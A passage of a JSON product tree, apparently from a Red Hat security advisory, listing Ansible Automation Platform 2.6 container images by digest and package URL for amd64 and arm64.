"product_id": "registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:544021b673fcef3bfe5291e0e82ed387d93735b52c983cd7b8b15779f4676ac1_amd64",
"product_identification_helper": {
"purl": "pkg:oci/lightspeed-rhel9@sha256%3A544021b673fcef3bfe5291e0e82ed387d93735b52c983cd7b8b15779f4676ac1?arch=amd64\u0026repository_url=registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9\u0026tag=1785775360"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:9e97f4cb07e63cc820b988ff3bf7079a087f596341399339f9a94d056ac69301_amd64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:9e97f4cb07e63cc820b988ff3bf7079a087f596341399339f9a94d056ac69301_amd64",
"product_id": "registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:9e97f4cb07e63cc820b988ff3bf7079a087f596341399339f9a94d056ac69301_amd64",
"product_identification_helper": {
"purl": "pkg:oci/lightspeed-rhel9-operator@sha256%3A9e97f4cb07e63cc820b988ff3bf7079a087f596341399339f9a94d056ac69301?arch=amd64\u0026repository_url=registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator\u0026tag=1785629366"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:e607ceaa2e3e14859f1ad60b394a1a896c5505662fa17b10f5afd532bda8be9f_amd64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:e607ceaa2e3e14859f1ad60b394a1a896c5505662fa17b10f5afd532bda8be9f_amd64",
"product_id": "registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:e607ceaa2e3e14859f1ad60b394a1a896c5505662fa17b10f5afd532bda8be9f_amd64",
"product_identification_helper": {
"purl": "pkg:oci/mcp-tools-rhel9@sha256%3Ae607ceaa2e3e14859f1ad60b394a1a896c5505662fa17b10f5afd532bda8be9f?arch=amd64\u0026repository_url=registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9\u0026tag=1785633968"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:08cca1f9a75b0352f17d517f6b7bab53ccf7fba7ef1ff5cedf777c5b68dd15fa_amd64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:08cca1f9a75b0352f17d517f6b7bab53ccf7fba7ef1ff5cedf777c5b68dd15fa_amd64",
"product_id": "registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:08cca1f9a75b0352f17d517f6b7bab53ccf7fba7ef1ff5cedf777c5b68dd15fa_amd64",
"product_identification_helper": {
"purl": "pkg:oci/controller-rhel9@sha256%3A08cca1f9a75b0352f17d517f6b7bab53ccf7fba7ef1ff5cedf777c5b68dd15fa?arch=amd64\u0026repository_url=registry.redhat.io/ansible-automation-platform-26/controller-rhel9\u0026tag=1785753810"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:fa606a224ac6d3d5e17650a9b9a52e5cb76af57dc767adf79609e0ab95081304_amd64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:fa606a224ac6d3d5e17650a9b9a52e5cb76af57dc767adf79609e0ab95081304_amd64",
"product_id": "registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:fa606a224ac6d3d5e17650a9b9a52e5cb76af57dc767adf79609e0ab95081304_amd64",
"product_identification_helper": {
"purl": "pkg:oci/controller-rhel9-operator@sha256%3Afa606a224ac6d3d5e17650a9b9a52e5cb76af57dc767adf79609e0ab95081304?arch=amd64\u0026repository_url=registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator\u0026tag=1785629452"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:9c7fea42d26e687c017aa573fa13b01ee738c88fe11e55317430e4e8b66d339c_amd64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:9c7fea42d26e687c017aa573fa13b01ee738c88fe11e55317430e4e8b66d339c_amd64",
"product_id": "registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:9c7fea42d26e687c017aa573fa13b01ee738c88fe11e55317430e4e8b66d339c_amd64",
"product_identification_helper": {
"purl": "pkg:oci/eda-controller-rhel9@sha256%3A9c7fea42d26e687c017aa573fa13b01ee738c88fe11e55317430e4e8b66d339c?arch=amd64\u0026repository_url=registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9\u0026tag=1785633038"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:53432365b9bb22c5df6da741687df208111fcabdea834a3fe9159b0ecf4b73df_amd64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:53432365b9bb22c5df6da741687df208111fcabdea834a3fe9159b0ecf4b73df_amd64",
"product_id": "registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:53432365b9bb22c5df6da741687df208111fcabdea834a3fe9159b0ecf4b73df_amd64",
"product_identification_helper": {
"purl": "pkg:oci/eda-controller-rhel9-operator@sha256%3A53432365b9bb22c5df6da741687df208111fcabdea834a3fe9159b0ecf4b73df?arch=amd64\u0026repository_url=registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator\u0026tag=1785629468"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:361532ae39672ed922d1e23a09c99cc6f3e596e482c0180d9858346b584c9449_amd64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:361532ae39672ed922d1e23a09c99cc6f3e596e482c0180d9858346b584c9449_amd64",
"product_id": "registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:361532ae39672ed922d1e23a09c99cc6f3e596e482c0180d9858346b584c9449_amd64",
"product_identification_helper": {
"purl": "pkg:oci/eda-controller-ui-rhel9@sha256%3A361532ae39672ed922d1e23a09c99cc6f3e596e482c0180d9858346b584c9449?arch=amd64\u0026repository_url=registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9\u0026tag=1785730469"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:eb6a63704d33b1dcb9eefea57763389c0eeb94c6206e63711c95ac3f0163753c_amd64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:eb6a63704d33b1dcb9eefea57763389c0eeb94c6206e63711c95ac3f0163753c_amd64",
"product_id": "registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:eb6a63704d33b1dcb9eefea57763389c0eeb94c6206e63711c95ac3f0163753c_amd64",
"product_identification_helper": {
"purl": "pkg:oci/gateway-rhel9@sha256%3Aeb6a63704d33b1dcb9eefea57763389c0eeb94c6206e63711c95ac3f0163753c?arch=amd64\u0026repository_url=registry.redhat.io/ansible-automation-platform-26/gateway-rhel9\u0026tag=1785780020"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:2f9958a2ab37aa25749d5cb9eb9d0dc8bf6b79846963c04f95d09bcc061431e9_amd64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:2f9958a2ab37aa25749d5cb9eb9d0dc8bf6b79846963c04f95d09bcc061431e9_amd64",
"product_id": "registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:2f9958a2ab37aa25749d5cb9eb9d0dc8bf6b79846963c04f95d09bcc061431e9_amd64",
"product_identification_helper": {
"purl": "pkg:oci/gateway-rhel9-operator@sha256%3A2f9958a2ab37aa25749d5cb9eb9d0dc8bf6b79846963c04f95d09bcc061431e9?arch=amd64\u0026repository_url=registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator\u0026tag=1785774574"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:a9c0c6bcdcb061b85074a7e681c6152e7dc64b85571f2cc17001e18f26276ba8_amd64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:a9c0c6bcdcb061b85074a7e681c6152e7dc64b85571f2cc17001e18f26276ba8_amd64",
"product_id": "registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:a9c0c6bcdcb061b85074a7e681c6152e7dc64b85571f2cc17001e18f26276ba8_amd64",
"product_identification_helper": {
"purl": "pkg:oci/gateway-proxy-rhel9@sha256%3Aa9c0c6bcdcb061b85074a7e681c6152e7dc64b85571f2cc17001e18f26276ba8?arch=amd64\u0026repository_url=registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9\u0026tag=1785748239"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:af2444728b4c244f8e1b56a0f9d9c9325a1887987f25418833df09947f4ed7e5_amd64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:af2444728b4c244f8e1b56a0f9d9c9325a1887987f25418833df09947f4ed7e5_amd64",
"product_id": "registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:af2444728b4c244f8e1b56a0f9d9c9325a1887987f25418833df09947f4ed7e5_amd64",
"product_identification_helper": {
"purl": "pkg:oci/hub-rhel9@sha256%3Aaf2444728b4c244f8e1b56a0f9d9c9325a1887987f25418833df09947f4ed7e5?arch=amd64\u0026repository_url=registry.redhat.io/ansible-automation-platform-26/hub-rhel9\u0026tag=1785753568"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:5f8cfecd3442742b867aeba03ea24009fbd89b31cec0dc02eb02c4d9098dfcec_amd64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:5f8cfecd3442742b867aeba03ea24009fbd89b31cec0dc02eb02c4d9098dfcec_amd64",
"product_id": "registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:5f8cfecd3442742b867aeba03ea24009fbd89b31cec0dc02eb02c4d9098dfcec_amd64",
"product_identification_helper": {
"purl": "pkg:oci/hub-rhel9-operator@sha256%3A5f8cfecd3442742b867aeba03ea24009fbd89b31cec0dc02eb02c4d9098dfcec?arch=amd64\u0026repository_url=registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator\u0026tag=1785629524"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:ab5fb18f89334216119c70498585d74c689cdbf8fd21b5826b782d0b5427051f_amd64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:ab5fb18f89334216119c70498585d74c689cdbf8fd21b5826b782d0b5427051f_amd64",
"product_id": "registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:ab5fb18f89334216119c70498585d74c689cdbf8fd21b5826b782d0b5427051f_amd64",
"product_identification_helper": {
"purl": "pkg:oci/hub-web-rhel9@sha256%3Aab5fb18f89334216119c70498585d74c689cdbf8fd21b5826b782d0b5427051f?arch=amd64\u0026repository_url=registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9\u0026tag=1785756951"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:16a9f451252541eb555f27528fc547724345767b364d913323077743b84b1b7b_amd64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:16a9f451252541eb555f27528fc547724345767b364d913323077743b84b1b7b_amd64",
"product_id": "registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:16a9f451252541eb555f27528fc547724345767b364d913323077743b84b1b7b_amd64",
"product_identification_helper": {
"purl": "pkg:oci/metrics-service-rhel9-operator@sha256%3A16a9f451252541eb555f27528fc547724345767b364d913323077743b84b1b7b?arch=amd64\u0026repository_url=registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator\u0026tag=1785629735"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:a6ecee20b39158df405c56ed811a882c2ea82a996308b51fad6ac659c669c566_amd64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:a6ecee20b39158df405c56ed811a882c2ea82a996308b51fad6ac659c669c566_amd64",
"product_id": "registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:a6ecee20b39158df405c56ed811a882c2ea82a996308b51fad6ac659c669c566_amd64",
"product_identification_helper": {
"purl": "pkg:oci/metrics-service-rhel9@sha256%3Aa6ecee20b39158df405c56ed811a882c2ea82a996308b51fad6ac659c669c566?arch=amd64\u0026repository_url=registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9\u0026tag=1785634026"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:c0a8ca9591bb9385e2a8773aedbb40f84f4f4f229b0ec1b9bf16c4cedef2f6ad_amd64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:c0a8ca9591bb9385e2a8773aedbb40f84f4f4f229b0ec1b9bf16c4cedef2f6ad_amd64",
"product_id": "registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:c0a8ca9591bb9385e2a8773aedbb40f84f4f4f229b0ec1b9bf16c4cedef2f6ad_amd64",
"product_identification_helper": {
"purl": "pkg:oci/de-minimal-rhel9@sha256%3Ac0a8ca9591bb9385e2a8773aedbb40f84f4f4f229b0ec1b9bf16c4cedef2f6ad?arch=amd64\u0026repository_url=registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9\u0026tag=1785647559"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:a48db0666b33ef1be5ab4ff02d7584c3fa1516c8a18f09295ae6a220d2e2ebf6_amd64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:a48db0666b33ef1be5ab4ff02d7584c3fa1516c8a18f09295ae6a220d2e2ebf6_amd64",
"product_id": "registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:a48db0666b33ef1be5ab4ff02d7584c3fa1516c8a18f09295ae6a220d2e2ebf6_amd64",
"product_identification_helper": {
"purl": "pkg:oci/de-supported-rhel9@sha256%3Aa48db0666b33ef1be5ab4ff02d7584c3fa1516c8a18f09295ae6a220d2e2ebf6?arch=amd64\u0026repository_url=registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9\u0026tag=1785649812"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:03b16022be5e25db2bf45e01526c42b782baba00c0b94175d5598fe65574460e_amd64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:03b16022be5e25db2bf45e01526c42b782baba00c0b94175d5598fe65574460e_amd64",
"product_id": "registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:03b16022be5e25db2bf45e01526c42b782baba00c0b94175d5598fe65574460e_amd64",
"product_identification_helper": {
"purl": "pkg:oci/ee-minimal-rhel9@sha256%3A03b16022be5e25db2bf45e01526c42b782baba00c0b94175d5598fe65574460e?arch=amd64\u0026repository_url=registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9\u0026tag=1785779178"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:7dfd8a045a5df672dc2b4f76bff307c0a78c1703e0572f10c1e07bd46e735947_amd64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:7dfd8a045a5df672dc2b4f76bff307c0a78c1703e0572f10c1e07bd46e735947_amd64",
"product_id": "registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:7dfd8a045a5df672dc2b4f76bff307c0a78c1703e0572f10c1e07bd46e735947_amd64",
"product_identification_helper": {
"purl": "pkg:oci/ee-supported-rhel9@sha256%3A7dfd8a045a5df672dc2b4f76bff307c0a78c1703e0572f10c1e07bd46e735947?arch=amd64\u0026repository_url=registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9\u0026tag=1785777436"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:24d7574341fa646e12ca5180a655271b9d947907af80da860b2dab0b51442d12_amd64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:24d7574341fa646e12ca5180a655271b9d947907af80da860b2dab0b51442d12_amd64",
"product_id": "registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:24d7574341fa646e12ca5180a655271b9d947907af80da860b2dab0b51442d12_amd64",
"product_identification_helper": {
"purl": "pkg:oci/platform-resource-rhel9-operator@sha256%3A24d7574341fa646e12ca5180a655271b9d947907af80da860b2dab0b51442d12?arch=amd64\u0026repository_url=registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator\u0026tag=1785630454"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:a15644ebe6166a891d02fd672fa1c83242713096d3754a2fd20aa0627ccf45bf_amd64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:a15644ebe6166a891d02fd672fa1c83242713096d3754a2fd20aa0627ccf45bf_amd64",
"product_id": "registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:a15644ebe6166a891d02fd672fa1c83242713096d3754a2fd20aa0627ccf45bf_amd64",
"product_identification_helper": {
"purl": "pkg:oci/platform-resource-runner-rhel9@sha256%3Aa15644ebe6166a891d02fd672fa1c83242713096d3754a2fd20aa0627ccf45bf?arch=amd64\u0026repository_url=registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9\u0026tag=1785770922"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:ba3d764e2fcd2d4a8e145a1559bcf9c6daa006c1844ec0f22fecddd18fb39deb_amd64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:ba3d764e2fcd2d4a8e145a1559bcf9c6daa006c1844ec0f22fecddd18fb39deb_amd64",
"product_id": "registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:ba3d764e2fcd2d4a8e145a1559bcf9c6daa006c1844ec0f22fecddd18fb39deb_amd64",
"product_identification_helper": {
"purl": "pkg:oci/receptor-rhel9@sha256%3Aba3d764e2fcd2d4a8e145a1559bcf9c6daa006c1844ec0f22fecddd18fb39deb?arch=amd64\u0026repository_url=registry.redhat.io/ansible-automation-platform-26/receptor-rhel9\u0026tag=1785632117"
}
}
}
],
"category": "architecture",
"name": "amd64"
},
{
"branches": [
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:118ad39a5e775943911f5ec803eea0051dc1c720a4b3d3402394e68fa5ca7ca7_arm64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:118ad39a5e775943911f5ec803eea0051dc1c720a4b3d3402394e68fa5ca7ca7_arm64",
"product_id": "registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:118ad39a5e775943911f5ec803eea0051dc1c720a4b3d3402394e68fa5ca7ca7_arm64",
"product_identification_helper": {
"purl": "pkg:oci/mcp-server-rhel9@sha256%3A118ad39a5e775943911f5ec803eea0051dc1c720a4b3d3402394e68fa5ca7ca7?arch=arm64\u0026repository_url=registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9\u0026tag=1785773509"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:6458f36f24c26733e1a052ce8a1beac8efed6da6574133103d8dc7b868e580b2_arm64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:6458f36f24c26733e1a052ce8a1beac8efed6da6574133103d8dc7b868e580b2_arm64",
"product_id": "registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:6458f36f24c26733e1a052ce8a1beac8efed6da6574133103d8dc7b868e580b2_arm64",
"product_identification_helper": {
"purl": "pkg:oci/aap-must-gather-rhel9@sha256%3A6458f36f24c26733e1a052ce8a1beac8efed6da6574133103d8dc7b868e580b2?arch=arm64\u0026repository_url=registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9\u0026tag=1785630119"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:ec267e7bd945593d9bcd3be6201176e5b28376cdd5900d5da8c6f033b0420558_arm64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:ec267e7bd945593d9bcd3be6201176e5b28376cdd5900d5da8c6f033b0420558_arm64",
"product_id": "registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:ec267e7bd945593d9bcd3be6201176e5b28376cdd5900d5da8c6f033b0420558_arm64",
"product_identification_helper": {
"purl": "pkg:oci/ansible-builder-rhel9@sha256%3Aec267e7bd945593d9bcd3be6201176e5b28376cdd5900d5da8c6f033b0420558?arch=arm64\u0026repository_url=registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9\u0026tag=1785745574"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:33d841d14081ec5f0289e79b6644acb4b5a038f59191493d763d7db4328aeb94_arm64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:33d841d14081ec5f0289e79b6644acb4b5a038f59191493d763d7db4328aeb94_arm64",
"product_id": "registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:33d841d14081ec5f0289e79b6644acb4b5a038f59191493d763d7db4328aeb94_arm64",
"product_identification_helper": {
"purl": "pkg:oci/ansible-devspaces-rhel9@sha256%3A33d841d14081ec5f0289e79b6644acb4b5a038f59191493d763d7db4328aeb94?arch=arm64\u0026repository_url=registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9\u0026tag=1785629819"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:e779c125e7fd9307e117fc7f4e4411f450871417f0447deb68c3821c26cae764_arm64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:e779c125e7fd9307e117fc7f4e4411f450871417f0447deb68c3821c26cae764_arm64",
"product_id": "registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:e779c125e7fd9307e117fc7f4e4411f450871417f0447deb68c3821c26cae764_arm64",
"product_identification_helper": {
"purl": "pkg:oci/ansible-dev-tools-rhel9@sha256%3Ae779c125e7fd9307e117fc7f4e4411f450871417f0447deb68c3821c26cae764?arch=arm64\u0026repository_url=registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9\u0026tag=1785784320"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:50f2bcf49966112665eb82a30e199af6041624e5cdb2372a85075405acf63ab8_arm64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:50f2bcf49966112665eb82a30e199af6041624e5cdb2372a85075405acf63ab8_arm64",
"product_id": "registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:50f2bcf49966112665eb82a30e199af6041624e5cdb2372a85075405acf63ab8_arm64",
"product_identification_helper": {
"purl": "pkg:oci/lightspeed-chatbot-rhel9@sha256%3A50f2bcf49966112665eb82a30e199af6041624e5cdb2372a85075405acf63ab8?arch=arm64\u0026repository_url=registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9\u0026tag=1785646188"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:d0230cc8ceaa4a82381b566d3661a49567f62c47ec8da11e8c96550e30bcb88f_arm64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:d0230cc8ceaa4a82381b566d3661a49567f62c47ec8da11e8c96550e30bcb88f_arm64",
"product_id": "registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:d0230cc8ceaa4a82381b566d3661a49567f62c47ec8da11e8c96550e30bcb88f_arm64",
"product_identification_helper": {
"purl": "pkg:oci/lightspeed-rhel9@sha256%3Ad0230cc8ceaa4a82381b566d3661a49567f62c47ec8da11e8c96550e30bcb88f?arch=arm64\u0026repository_url=registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9\u0026tag=1785775360"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:45057e5ae8e5a7bb6646bd7896707859539039e409ac334e8cb3eb99c554e031_arm64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:45057e5ae8e5a7bb6646bd7896707859539039e409ac334e8cb3eb99c554e031_arm64",
"product_id": "registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:45057e5ae8e5a7bb6646bd7896707859539039e409ac334e8cb3eb99c554e031_arm64",
"product_identification_helper": {
"purl": "pkg:oci/lightspeed-rhel9-operator@sha256%3A45057e5ae8e5a7bb6646bd7896707859539039e409ac334e8cb3eb99c554e031?arch=arm64\u0026repository_url=registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator\u0026tag=1785629366"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:389567d267aab51c7fce52a23439c821995099cec9e37f5962a5dc2114597f84_arm64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:389567d267aab51c7fce52a23439c821995099cec9e37f5962a5dc2114597f84_arm64",
"product_id": "registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:389567d267aab51c7fce52a23439c821995099cec9e37f5962a5dc2114597f84_arm64",
"product_identification_helper": {
"purl": "pkg:oci/mcp-tools-rhel9@sha256%3A389567d267aab51c7fce52a23439c821995099cec9e37f5962a5dc2114597f84?arch=arm64\u0026repository_url=registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9\u0026tag=1785633968"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:381cb54bf157086017cfea6db2a32895b6109640520b4f35f4791b2295c0db29_arm64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:381cb54bf157086017cfea6db2a32895b6109640520b4f35f4791b2295c0db29_arm64",
"product_id": "registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:381cb54bf157086017cfea6db2a32895b6109640520b4f35f4791b2295c0db29_arm64",
"product_identification_helper": {
"purl": "pkg:oci/controller-rhel9@sha256%3A381cb54bf157086017cfea6db2a32895b6109640520b4f35f4791b2295c0db29?arch=arm64\u0026repository_url=registry.redhat.io/ansible-automation-platform-26/controller-rhel9\u0026tag=1785753810"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:2a24b3e44cd208c8176d4739cf3fc7a19e9fff3b531ab7718de6f5a99db4e4d1_arm64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:2a24b3e44cd208c8176d4739cf3fc7a19e9fff3b531ab7718de6f5a99db4e4d1_arm64",
"product_id": "registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:2a24b3e44cd208c8176d4739cf3fc7a19e9fff3b531ab7718de6f5a99db4e4d1_arm64",
"product_identification_helper": {
"purl": "pkg:oci/controller-rhel9-operator@sha256%3A2a24b3e44cd208c8176d4739cf3fc7a19e9fff3b531ab7718de6f5a99db4e4d1?arch=arm64\u0026repository_url=registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator\u0026tag=1785629452"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:38f097e4920d4e64c8b8839fcc353f4ff32e607719b5e36f23e208bc70d75b59_arm64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:38f097e4920d4e64c8b8839fcc353f4ff32e607719b5e36f23e208bc70d75b59_arm64",
"product_id": "registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:38f097e4920d4e64c8b8839fcc353f4ff32e607719b5e36f23e208bc70d75b59_arm64",
"product_identification_helper": {
"purl": "pkg:oci/eda-controller-rhel9@sha256%3A38f097e4920d4e64c8b8839fcc353f4ff32e607719b5e36f23e208bc70d75b59?arch=arm64\u0026repository_url=registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9\u0026tag=1785633038"
}
}
},
{
